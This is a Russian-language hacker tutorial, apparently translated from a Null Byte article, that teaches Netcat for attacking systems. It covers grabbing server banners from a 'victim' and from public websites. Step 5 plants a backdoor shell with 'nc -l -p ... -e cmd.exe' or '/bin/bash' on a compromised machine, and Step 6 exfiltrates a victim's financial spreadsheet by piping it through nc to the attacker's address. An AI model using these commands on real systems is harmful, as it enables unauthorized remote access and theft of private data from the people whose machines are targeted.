Как использовать Netcat - швейцарский армейский нож хакерских утилит
Оценка пользователей: / 18
ПлохоОтлично 

netcat

Netcat хорошо известен в кругах хакеров, но практически неизвестен за их пределами, хотя настолько мощный и полезный, что многие относятся к нему как к "швейцарскому армейскому ножу хакерских утилит".
Рассмотрим возможности этого простого инструмента и как начинающий хакер может его использовать.
Действительно. что такое Netcat?
Netcat, как и многие хакерские утилиты, был создан как инструмент анализа сети. Разработанный специалистом, известным лишь как "Hobbit", отдавший этот инструмент для ИТ -сообщества без компенсации, но получил десятки наград. Спасибо, Hobbit!
Таким образом, Вы можете использовать его, чтобы открыть TCP и UDP соединения между двумя компьютерами через любой порт, который душа пожелает. Он также может быть использован как инструмент сканирования портов, подобно nmap. Кроме того, он может быть использован для перенаправления портов, прокси, простого веб - сервера, и чтобы оставить открытым бэкдор для хакера.
Давайте с помощью системы BackTrack посмотрим на некоторые из этих возможностей.
Шаг 1: Откройте Netcat
После того, как мы запустили нашу систему BackTrack и открыли терминал, можем использовать Netcat с любого каталога, так как он находится в нашем каталоге bin, который есть в нашей переменной PATH по умолчанию. Итак, давайте введем:
· nc -h
netcat-1
Как Вы можете видеть, основной синтаксис Netcat заключается в следующем.
Чтобы подключиться к другой машине:
· nc options host IP address port
чтобы прослушивать входящие соединения:
· nc -l -p port
Шаг 2: Используйте Netcat для подключения к удаленной системе
Давайте используем Netcat для подключения к удаленной системе. В нашем случае, постараемся подключиться к веб-серверу через порт 80. Набираем:
· nc 192.168.1.105 80
netcat-2
Это дает нам соединения TCP, по умолчанию, к веб-серверу (порт 80) на 192.168.1.105. Теперь, все, что мы вводим, будет направлено непосредственно на веб-сервер, когда мы нажмем Enter.
Шаг 3: Используйте Netcat, чтобы захватить баннер с отпечатками пальцев ОС
Как только мы получили связь TCP с веб мы можем использовать Netcat, чтобы захватить баннер веб сервера для идентификации, какое программное обеспечение работает на веб-сервере жертвы.
Помните, что, прежде чем атаковать любую систему, мы должны узнать как можно больше о жертве. Netcat может помочь нам с этой задачей, захватывая баннеры, которые веб-серверы обслуживают для новых подключений.
Теперь, когда у нас есть связь, мы можем захватить баннер с веб - сервера с помощью команды:
· HEAD / HTTP/1.0
Будьте внимательными и скопируйте в точности, как ввел автор, с косой чертой и пробелами.
netcat-3
Нажмите Enter несколько раз, и веб -сервер ответит своим баннером, сообщив нам, какое его программное обеспечение запущено. В нашем случае, мы можем видеть, что веб - сервер работает под управлением Microsoft IIS 6.0.
Мы можем использовать эту технику также на других общедоступных сайтах. Давайте попробуем на некоторых широко известных сайтах и посмотрим, какое программное обеспечение они используют на веб-сервере. Во-первых, давайте попробуем сайт wonderhowto.com. Когда мы пропингуем wonderhowto.com, то увидим, что IP-адрес 98.129.110.26. Таким образом, можно затем ввести:
· nc 98.129.110.26 80
После того, как будет связь, мы можем захватить баннер веба, снова набрав:
· HEAD / HTTP/1.0
А потом нажмите Enter два или три раза.
netcat-4
Как видим, wonderhowto.com работает на Microsoft-IIS/7.5.
Если мы попробуем то же самое с cnn.com, то получим результаты, приведенные ниже:
netcat-5
Интересно, cnn.com работает на nginx - веб сервере с открытым исходным кодом, который за очень короткий промежуток времени достиг в глобальном масштабе общего числа установок Microsoft IIS (Apache, как и раньше, используют более 60 % веб-серверов на планете).
Идите дальше и попробуйте его на других веб-сайтах и выясните, какие серверы они используют.
Шаг 4: Используйте Netcat для прослушивания подключений
Теперь давайте используем netcat, чтобы создать слушателя на удаленной системе. Предположим, что у нас есть Windows Server, на котором мы установили netcat. Теперь мы можем ввести следующее, чтобы открыть netcat слушателя на порту 6996 (это может быть любой порт) в этой системе:
· nc - l -p 6996
netcat-6
Так был создан "слушатель", который может подключиться к нашему досугу. Обратите внимание, что на системах Windows, мы можем запустить эту же команду с верхним регистром L и это создаст постоянного слушателя, который откроется, даже если система будет перезагружена.
Шаг 5: Создайте Backdoor
Теперь давайте создадим бэкдор на зараженной системе, чтобы мы могли вернуться в любое время. Команда будет незначительно отличаться в зависимости от того, какую систему, Linux или Windows, атакуем.
Для Windows мы используем:
· nc -l -p 6996 -e cmd.еxe
Для Linux используем:
· nc -l -p 6996 -e /bin/bash
Это откроет слушателя на системе, будет "трубой" команды оболочки или оболочки Linux Bash к подключенной системе. Теперь на нашей атакующей системе мы вводим:
· nc 192.168.1.105 6996
netcat-7
Как Вы можете видеть, командную строку Windows провел по трубопроводу через наше подключение netcat непосредственно к нашей атакующей системе! Мы имеем этот ящик!
Шаг 6: Скопируйте файлы (exfiltrate) из мишени
Netcat также может быть использован для фильтрации файлов и данных от жертвы. Давайте представим, что есть данные на системе жертвы, которые мы хотим. Возможно, финансовые данные или данные, хранящиеся в базе данных. Мы можем использовать стелс-подключение для медленного копирования этих данных на нашу атакующую систему. В приведенном примере будем фильтровать файл с именем financialprojections.xls, вероятно, Excel файл финансовых прогнозов.
Из системы источника вводим:
· type financialprojections.xls | nc 192.168.1.104 6996
Эта команда говорит: отобразить файл financialprojections.xls, а затем передать его по каналу (|) в netcat (nc) с IP-адресом 192.168.1.104 через порт 6996.
netcat-8
Из системы назначения мы набираем:
· nc -l -p 6996 > financialprojections.xls
Эта команда говорит: создать слушателя (L) на порту (г) 6996, а затем отправить данные, полученные на этом слушателе в файл с именем financialprojections.xls.
netcat-9
Мы можем видеть на скриншоте ниже, что файл был скопирован через наше соединение netcat через порт 6996 на нашу атакующую машину!
netcat-10
Это лишь небольшой пример того, что может сделать эта мощная маленькая программа. Объединив ее с некоторыми основными навыками создания сценариев, можете только представить себе, какие невероятные вещи сможете делать!
(Источник EN: null-byte.wonderhowto.com)
 
>
КнигаНовости Практика поискаПартнерыО нас
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting